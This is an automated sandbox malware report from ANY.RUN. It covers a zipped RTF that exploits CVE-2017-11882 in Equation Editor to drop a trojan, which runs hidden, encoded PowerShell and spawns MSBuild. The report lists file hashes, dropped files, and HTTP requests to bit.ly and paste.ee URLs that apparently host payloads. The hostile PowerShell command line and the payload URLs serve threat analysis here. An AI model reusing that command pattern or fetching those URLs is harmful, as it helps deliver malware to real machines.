File name: 6086271296897024.zip

Full analysis: https://app.any.run/tasks/0a932e63-544c-414c-9f95-7c760b543004
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: July 12, 2020, 13:15:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: exploit, CVE-2017-11882, trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 4E22C5136038AB55F52BE855DA0BB996
SHA1: 7156DC58D9FC30DE7FA19AD3B419C7A0FBFBAA78
SHA256: 958F396FD5BE84958909AC04E4EF6B93D5880CF53A050BC63269F42650AE63C2
SSDEEP: 3072:uOUWF6qQxZMohJ9c1Jbo22OQlrzTz5ukuruu+s7RuN:EU1iZPhJ9U72OQdzTNti+sNuN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 908.exe (PID: 1244)
    • Equation Editor starts application (CVE-2017-11882)
      • EQNEDT32.EXE (PID: 1752)
  • SUSPICIOUS
    • Executable content was dropped or overwritten
      • EQNEDT32.EXE (PID: 1752)
    • Executed via COM
      • EQNEDT32.EXE (PID: 1752)
    • Executes PowerShell scripts
      • 908.exe (PID: 1244)
    • Creates files in the user directory
      • EQNEDT32.EXE (PID: 1752)
      • powershell.exe (PID: 2124)
    • Reads Internet Cache Settings
      • EQNEDT32.EXE (PID: 1752)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3012)
    • Reads settings of System Certificates
      • EQNEDT32.EXE (PID: 1752)
      • powershell.exe (PID: 2124)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3012)
    • Manual execution by user
      • WINWORD.EXE (PID: 3012)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .zip | ZIP compressed archive (100)

EXIF (ZIP):

ZipFileName: 8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522
ZipUncompressedSize: 365817
ZipCompressedSize: 117115
ZipCRC: 0xe8f1c18f
ZipModifyDate: 1980:00:00 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 54
Monitored processes: 17
Malicious processes: 1
Suspicious processes: 1

Behavior graph

Graph nodes as rendered (edge types: start; drop and start): winrar.exe (no specs), winword.exe (no specs), eqnedt32.exe, 908.exe, powershell.exe, and twelve msbuild.exe instances (no specs). Process details are in the full report.

Process information

PID: 556
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6086271296897024.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 3012
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522.rtf"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 1752
CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Parent process: svchost.exe
User: admin
Company: Design Science, Inc.
Integrity Level: MEDIUM
Description: Microsoft Equation Editor
Exit code: 0
Version: 00110900

PID: 1244
CMD: C:\Users\Public\908.exe
Path: C:\Users\Public\908.exe
Parent process: EQNEDT32.EXE
User: admin
Integrity Level: MEDIUM
Exit code: 0
Version: 1.0.0.0

PID: 2124
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: 908.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PIDs: 3484, 3836, 3284, 4088, 1712 (five MSBuild instances with identical attributes)
CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: MSBuild.exe
Exit code: 4294967295
Version: 2.0.50727.5420 built by: Win7SP1
Total events: 2 661
Read events: 1 472
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 4
Text files: 4
Unknown types: 5

Dropped files

PID: 556 (WinRAR.exe)
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb556.11415\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522
Type, MD5, SHA256: not listed

PID: 3012 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\CVRD611.tmp.cvr
Type, MD5, SHA256: not listed

PID: 1752 (EQNEDT32.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\CabE767.tmp
Type, MD5, SHA256: not listed

PID: 1752 (EQNEDT32.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\TarE768.tmp
Type, MD5, SHA256: not listed

PID: 2124 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NTV61T3VP6NGRZ86E8R2.temp
Type, MD5, SHA256: not listed

PID: 1752 (EQNEDT32.EXE)
Filename: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
Type: binary
MD5: BC1667EF48D5B00ED122BBD5211106BA
SHA256: D36E5FB0141F227D27E1C716F57AD9B772EB52292CE11E50DAA65D3B67AF8092

PID: 1752 (EQNEDT32.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\YSRS8O6X.txt
Type: text
MD5: 793AD7C4083C5DCA624D3C38D33C7FE1
SHA256: 566B3D7E1440AC5F5E1FC4C88F4923E94D317E66C05FCF7A31BAA19B4AF2A485

PID: 3012 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: 370590E8C03082DE140E0908302D5FB5
SHA256: D1B1854C78F45C5BAA04BE1F1253A9590EE46994294C5E804020AF95E30C7FB3

PID: 3012 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\8a368db4df55b8ea68fdb0e355914aa29578431c22bad172a0fc6d8e7a4ba522.rtf.LNK
Type: lnk
MD5: 93F530D78A794BDEEBAE39D991643340
SHA256: 91F73D3A603D9848096D9B028FDDB7044308D274A9E30FBD126EE3EC76919981

PID: 2124 (powershell.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16f5ee.TMP
Type: binary
MD5: 4282EB62D5CEC4159F21BCBA409BBD04
SHA256: 553F7C4296E4B0D9FFD6950190BF439155DE37F75EABE290509CE71671511EE5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 7
DNS requests: 5
Threats: 0

HTTP requests

PID: 1752 (EQNEDT32.EXE)
GET http://bit.ly/38JAeJi
HTTP code: 301 | IP: 67.199.248.10:80 | CN: US | Type: html | Size: 116 b | Reputation: shared

PID: 1752 (EQNEDT32.EXE)
GET http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D
HTTP code: 200 | IP: 2.16.107.73:80 | CN: unknown | Type: der | Size: 1.37 Kb | Reputation: whitelisted

PID: 1244 (908.exe)
GET http://paste.ee/r/bZoYo
HTTP code: 301 | IP: 172.67.219.133:80 | CN: US | Type: html | Size: 162 b | Reputation: shared

PID: 2124 (powershell.exe)
GET http://paste.ee/r/LkmTd
HTTP code: 301 | IP: 172.67.219.133:80 | CN: US | Type: html | Size: 162 b | Reputation: shared

Connections

PID: 1752 (EQNEDT32.EXE) | IP: 2.16.107.73:80 | Domain: isrg.trustid.ocsp.identrust.com | ASN: Akamai International B.V. | CN: not listed | Reputation: suspicious
PID: 1752 (EQNEDT32.EXE) | IP: 67.199.248.10:80 | Domain: bit.ly | ASN: Bitly Inc | CN: US | Reputation: shared
PID: 1752 (EQNEDT32.EXE) | IP: 5.79.72.163:443 | Domain: u.teknik.io | ASN: LeaseWeb Netherlands B.V. | CN: NL | Reputation: malicious
PID: 2124 (powershell.exe) | IP: 172.67.219.133:80 | Domain: paste.ee | ASN: not listed | CN: US | Reputation: malicious
PID: 1244 (908.exe) | IP: 172.67.219.133:80 | Domain: paste.ee | ASN: not listed | CN: US | Reputation: malicious
PID: 2124 (powershell.exe) | IP: 172.67.219.133:443 | Domain: paste.ee | ASN: not listed | CN: US | Reputation: malicious
PID: 1244 (908.exe) | IP: 172.67.219.133:443 | Domain: paste.ee | ASN: not listed | CN: US | Reputation: malicious

DNS requests

bit.ly: 67.199.248.10, 67.199.248.11 (reputation: shared)
u.teknik.io: 5.79.72.163 (reputation: whitelisted)
isrg.trustid.ocsp.identrust.com: 2.16.107.73, 2.16.107.80 (reputation: whitelisted)
paste.ee: 172.67.219.133, 104.18.49.20, 104.18.48.20 (reputation: shared)
pastecode.xyz: no IP listed (reputation: malicious)

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info